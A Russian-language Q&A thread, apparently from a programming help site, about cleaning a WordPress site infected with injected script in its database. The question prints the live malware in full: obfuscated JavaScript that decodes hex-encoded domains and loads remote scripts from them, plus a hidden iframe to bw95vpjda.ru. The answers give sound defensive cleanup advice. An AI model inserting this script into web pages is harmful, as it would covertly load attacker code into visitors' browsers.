# Как бороться с WordPress вирусом?

Tags: mysql, wordpress, вирусы

Впервые столкнулись с подобного рода заразой:

```
<script>// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","393667743863796932373774682e7275"]'),e="",t="10252",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("accum.com.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
// ]]></script><iframe id="a1996667054" style="display: none;" src="https://bw95vpjda.ru/f.html"></iframe>
```

Вставляется в код страниц и записей, в базе данных хранится в **wp_postmeta** и  **wp_posts**. Искали "bw95vpjda.ru" в файлах - ничего не найдено, скорее всего домен шифруется. В поддержке сказали, что их сервер не может быть заражен.

Как поступить?

**Как мы решили проблему:**
Поставили чистый Wordpress, а затем поочередно установили тему и плагины. Вирус скрывался в одном из плагинов.

Comment: Искать способ проникновения. Ставить у нуля можно, но не факт, что это не станет временным решением

Comment: "сказали, что их сервер не может быть заражен" самоуверенность 80-lvl

Comment: @Bogdan: `Wordpress вирусом?` Оговорка по Фрейду )) Удалить этот wordpress-вирус!

Comment: @Bogdan: [Новая критическая уязвимость в WordPress](http://www.opennet.ru/opennews/art.shtml?num=42117); [ФБР предупредило о волне атак на уязвимые плагины к WordPress](http://www.opennet.ru/opennews/art.shtml?num=42007); [Более ста тысяч сайтов на платформе WordPress поражены вредоносным ПО](http://www.opennet.ru/opennews/art.shtml?num=41268); [В WordPress 3.x выявлена уязвимость, позволяющая подставить JavaScript-код через комментарий](http://www.opennet.ru/opennews/art.shtml?num=41119)

Comment: @Bogdan: `вирус скрывался в одном из плаигнов.` Кто бы сомневался.

Comment: Научился лечить зараженные темы, [отписался на форуме](https://wordpress.org/support/topic/code-added-to-functions-file/#post-8709527) как это делать.

Answer (score 3, accepted):

Зловредная информация может попасть в базу несколькими способами. Например:

1. Прямой доступ к базе (это нужно выяснить у провайдера);
2. Скрипты с доступом к базе у "соседей по хостингу" (если хостинг виртуальный);
3. Скрипты - "подкидыши" прямо у вас на сайте (искать все php, которые не принадлежат Wordpress);
4. Модифицированный Wordpress (сравнивать с оригиналом файлы или хеши);
5. Дыра в Wordpress.

Последние два варианта можно обнаружить так:

Набросайте плагин, который будет перехватывать экшн `save_post` и писать весь изменяемый контент в отдельный файл (например через `file_put_contents( ..., FILE_APPEND )`). При это добавьте дату/время, информацию из `$_SERVER['REMOTE_ADDR']`, `$_SERVER['REQUEST_METHOD']`, `$_SERVER['HTTP_USER_AGENT']` ... и, обязательно результат `debug_backtrace()`.

Перед запуском плагина сделайте бекап, очистите базу от нечисти и периодически смотрите в файл, что там пишется.

Answer (score 3):

Удаляете все на сервере, заливаете заведомо чистую копию сайта. Искать можно до посинения, потому что ни один "сканер" не дает 100% гарантии.

Comment: Уже думаем над этим вариантом.

Answer (score 1):

есть отличный антивирус называется ai-bolit, запускаете его из консоли, работает долго, а потом открываете отчет и смотрите дыры или опасные куски кода

Answer (score 1):

Обычно все гораздо проще. Вычисти все левые файлы и установи стандартную тему и отключи все плагины. Убедись, что система чиста. Если она чиста, то дальше включай плагины по одному и убедись, что все в порядке. И в заключении тему. Как правило если wordpress не подменили код исполняется из файлов плагинов или тем.

Answer (score 0):

Чаще всего вирус скрывается в базе данных. То, что в плагинах, темах, создаваемых пхп-файлах и прочее - это лишь верхушка айсберга. Ставить вордпресс с нуля, оставив лишь картинки, как это советуют некоторые "профессионалы" - лишь временное решение проблемы. Пока не найдёте вирус в БД, так и будете бесконечно переустанавливать вордпресс, плагины, темы и т.п. Дело НЕ в них!